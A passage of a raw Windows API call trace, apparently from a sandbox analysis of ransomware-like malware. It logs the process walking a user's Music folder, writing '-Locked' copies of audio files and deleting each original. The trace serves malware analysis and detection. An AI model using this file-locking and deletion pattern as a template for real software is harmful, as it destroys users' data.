lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x465b8f30, ftCreationTime.dwHighDateTime=0x1d7e3aa, ftLastAccessTime.dwLowDateTime=0xf36fb50, ftLastAccessTime.dwHighDateTime=0x1d7e3bb, ftLastWriteTime.dwLowDateTime=0xf36fb50, ftLastWriteTime.dwHighDateTime=0x1d7e3bb, nFileSizeHigh=0x0, nFileSizeLow=0x48c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hc-ff1Mym_xG 8y7.wav", cAlternateFileName="HC-FF1~1.WAV")) returned 1 [0302.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b9900, ftCreationTime.dwHighDateTime=0x1d7dcdf, ftLastAccessTime.dwLowDateTime=0xda6309b0, ftLastAccessTime.dwHighDateTime=0x1d7e053, ftLastWriteTime.dwLowDateTime=0xda6309b0, ftLastWriteTime.dwHighDateTime=0x1d7e053, nFileSizeHigh=0x0, nFileSizeLow=0x6c9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZBiyuFJk P66leN.wav", cAlternateFileName="PZBIYU~1.WAV")) returned 1 [0302.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x32972b60, ftLastAccessTime.dwHighDateTime=0x1d7df29, ftLastWriteTime.dwLowDateTime=0x32972b60, ftLastWriteTime.dwHighDateTime=0x1d7df29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suzai", cAlternateFileName="")) returned 1 [0302.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7857aab0, ftCreationTime.dwHighDateTime=0x1d7e6fb, ftLastAccessTime.dwLowDateTime=0x3612bfb0, ftLastAccessTime.dwHighDateTime=0x1d7e74f, ftLastWriteTime.dwLowDateTime=0x3612bfb0, ftLastWriteTime.dwHighDateTime=0x1d7e74f, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x0, dwReserved1=0x0, cFileName="YchaUe.m4a", cAlternateFileName="")) returned 1 [0302.663] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fa9a20, ftCreationTime.dwHighDateTime=0x1d7de4d, ftLastAccessTime.dwLowDateTime=0xf718f1e0, ftLastAccessTime.dwHighDateTime=0x1d7e38d, ftLastWriteTime.dwLowDateTime=0xf718f1e0, ftLastWriteTime.dwHighDateTime=0x1d7e38d, nFileSizeHigh=0x0, nFileSizeLow=0x1713b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yhytw0.m4a", cAlternateFileName="")) returned 1 [0302.664] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ce2280, ftCreationTime.dwHighDateTime=0x1d7e563, ftLastAccessTime.dwLowDateTime=0x947a5dc0, ftLastAccessTime.dwHighDateTime=0x1d7e77b, ftLastWriteTime.dwLowDateTime=0x947a5dc0, ftLastWriteTime.dwHighDateTime=0x1d7e77b, nFileSizeHigh=0x0, nFileSizeLow=0xaa41, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZD9ZxqvIbPOBH.mp3", cAlternateFileName="ZD9ZXQ~1.MP3")) returned 1 [0302.664] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ce2280, ftCreationTime.dwHighDateTime=0x1d7e563, ftLastAccessTime.dwLowDateTime=0x947a5dc0, ftLastAccessTime.dwHighDateTime=0x1d7e77b, ftLastWriteTime.dwLowDateTime=0x947a5dc0, ftLastWriteTime.dwHighDateTime=0x1d7e77b, nFileSizeHigh=0x0, nFileSizeLow=0xaa41, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZD9ZxqvIbPOBH.mp3", cAlternateFileName="ZD9ZXQ~1.MP3")) returned 0 [0302.664] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.665] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2e [0302.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.665] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.665] GetFileType (hFile=0x49c) returned 0x1 [0302.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.665] GetFileType (hFile=0x49c) returned 0x1 [0302.668] CloseHandle (hObject=0x49c) returned 1 [0302.668] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini", lpFilePart=0x0) returned 0x27 [0302.668] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\desktop.ini")) returned 1 [0302.669] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked", lpFilePart=0x0) returned 0x3a [0302.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.669] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\fliceljayp8j0i3clda.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.670] GetFileType (hFile=0x49c) returned 0x1 [0302.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.670] GetFileType (hFile=0x49c) returned 0x1 [0302.671] CloseHandle (hObject=0x49c) returned 1 [0302.671] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a", lpFilePart=0x0) returned 0x33 [0302.672] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\fliceljayp8j0i3clda.m4a")) returned 1 [0302.672] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked", lpFilePart=0x0) returned 0x37 [0302.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.672] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hc-ff1mym_xg 8y7.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.673] GetFileType (hFile=0x49c) returned 0x1 [0302.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.673] GetFileType (hFile=0x49c) returned 0x1 [0302.675] CloseHandle (hObject=0x49c) returned 1 [0302.675] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav", lpFilePart=0x0) returned 0x30 [0302.675] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hc-ff1mym_xg 8y7.wav")) returned 1 [0302.676] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked", lpFilePart=0x0) returned 0x37 [0302.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.676] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pzbiyufjk p66len.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.677] GetFileType (hFile=0x49c) returned 0x1 [0302.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.677] GetFileType (hFile=0x49c) returned 0x1 [0302.678] CloseHandle (hObject=0x49c) returned 1 [0302.678] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav", lpFilePart=0x0) returned 0x30 [0302.678] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pzbiyufjk p66len.wav")) returned 1 [0302.679] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked", lpFilePart=0x0) returned 0x2d [0302.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.679] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\ychaue.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.680] GetFileType (hFile=0x49c) returned 0x1 [0302.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.680] GetFileType (hFile=0x49c) returned 0x1 [0302.682] CloseHandle (hObject=0x49c) returned 1 [0302.682] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a", lpFilePart=0x0) returned 0x26 [0302.682] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\ychaue.m4a")) returned 1 [0302.856] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked", lpFilePart=0x0) returned 0x2d [0302.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.857] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\yhytw0.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.857] GetFileType (hFile=0x49c) returned 0x1 [0302.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.857] GetFileType (hFile=0x49c) returned 0x1 [0302.860] CloseHandle (hObject=0x49c) returned 1 [0302.860] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a", lpFilePart=0x0) returned 0x26 [0302.860] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\yhytw0.m4a")) returned 1 [0303.044] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked", lpFilePart=0x0) returned 0x34 [0303.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.044] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\zd9zxqvibpobh.mp3-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.044] GetFileType (hFile=0x49c) returned 0x1 [0303.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.045] GetFileType (hFile=0x49c) returned 0x1 [0303.046] CloseHandle (hObject=0x49c) returned 1 [0303.046] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3", lpFilePart=0x0) returned 0x2d [0303.047] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\zd9zxqvibpobh.mp3")) returned 1 [0303.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0303.132] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", lpFilePart=0x0) returned 0x21 [0303.132] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", lpFilePart=0x0) returned 0x22 [0303.132] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x32972b60, ftLastAccessTime.dwHighDateTime=0x1d7df29, ftLastWriteTime.dwLowDateTime=0x32972b60, ftLastWriteTime.dwHighDateTime=0x1d7df29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.133] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x32972b60, ftLastAccessTime.dwHighDateTime=0x1d7df29, ftLastWriteTime.dwLowDateTime=0x32972b60, ftLastWriteTime.dwHighDateTime=0x1d7df29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.133] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc415ce0, ftCreationTime.dwHighDateTime=0x1d7e74e, ftLastAccessTime.dwLowDateTime=0x2b283d0, ftLastAccessTime.dwHighDateTime=0x1d7e781, ftLastWriteTime.dwLowDateTime=0x2b283d0, ftLastWriteTime.dwHighDateTime=0x1d7e781, nFileSizeHigh=0x0, nFileSizeLow=0x2fef, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzU_ 4bXy7iRPpZe1.mp3", cAlternateFileName="AZU_4B~1.MP3")) returned 1 [0303.133] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fBHsX", cAlternateFileName="")) returned 1 [0303.133] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x881addf0, ftLastAccessTime.dwHighDateTime=0x1d7df0d, ftLastWriteTime.dwLowDateTime=0x881addf0, ftLastWriteTime.dwHighDateTime=0x1d7df0d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WyJ", cAlternateFileName="")) returned 1 [0303.134] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x881addf0, ftLastAccessTime.dwHighDateTime=0x1d7df0d, ftLastWriteTime.dwLowDateTime=0x881addf0, ftLastWriteTime.dwHighDateTime=0x1d7df0d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WyJ", cAlternateFileName="")) returned 0 [0303.134] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0303.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0303.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0303.134] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", lpFilePart=0x0) returned 0x21 [0303.134] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", lpFilePart=0x0) returned 0x22 [0303.134] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x32972b60, ftLastAccessTime.dwHighDateTime=0x1d7df29, ftLastWriteTime.dwLowDateTime=0x32972b60, ftLastWriteTime.dwHighDateTime=0x1d7df29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.135] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x32972b60, ftLastAccessTime.dwHighDateTime=0x1d7df29, ftLastWriteTime.dwLowDateTime=0x32972b60, ftLastWriteTime.dwHighDateTime=0x1d7df29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.135] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc415ce0, ftCreationTime.dwHighDateTime=0x1d7e74e, ftLastAccessTime.dwLowDateTime=0x2b283d0, ftLastAccessTime.dwHighDateTime=0x1d7e781, ftLastWriteTime.dwLowDateTime=0x2b283d0, ftLastWriteTime.dwHighDateTime=0x1d7e781, nFileSizeHigh=0x0, nFileSizeLow=0x2fef, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzU_ 4bXy7iRPpZe1.mp3", cAlternateFileName="AZU_4B~1.MP3")) returned 1 [0303.135] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fBHsX", cAlternateFileName="")) returned 1 [0303.135] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x881addf0, ftLastAccessTime.dwHighDateTime=0x1d7df0d, ftLastWriteTime.dwLowDateTime=0x881addf0, ftLastWriteTime.dwHighDateTime=0x1d7df0d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WyJ", cAlternateFileName="")) returned 1 [0303.136] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0303.136] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0303.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0303.136] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked", lpFilePart=0x0) returned 0x3e [0303.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0303.136] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\azu_ 4bxy7irppze1.mp3-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.138] GetFileType (hFile=0x49c) returned 0x1 [0303.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0303.138] GetFileType (hFile=0x49c) returned 0x1 [0303.140] CloseHandle (hObject=0x49c) returned 1 [0303.141] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3", lpFilePart=0x0) returned 0x37 [0303.141] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\azu_ 4bxy7irppze1.mp3")) returned 1 [0303.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0303.141] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX", lpFilePart=0x0) returned 0x27 [0303.141] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX\\", lpFilePart=0x0) returned 0x28 [0303.141] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.146] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, 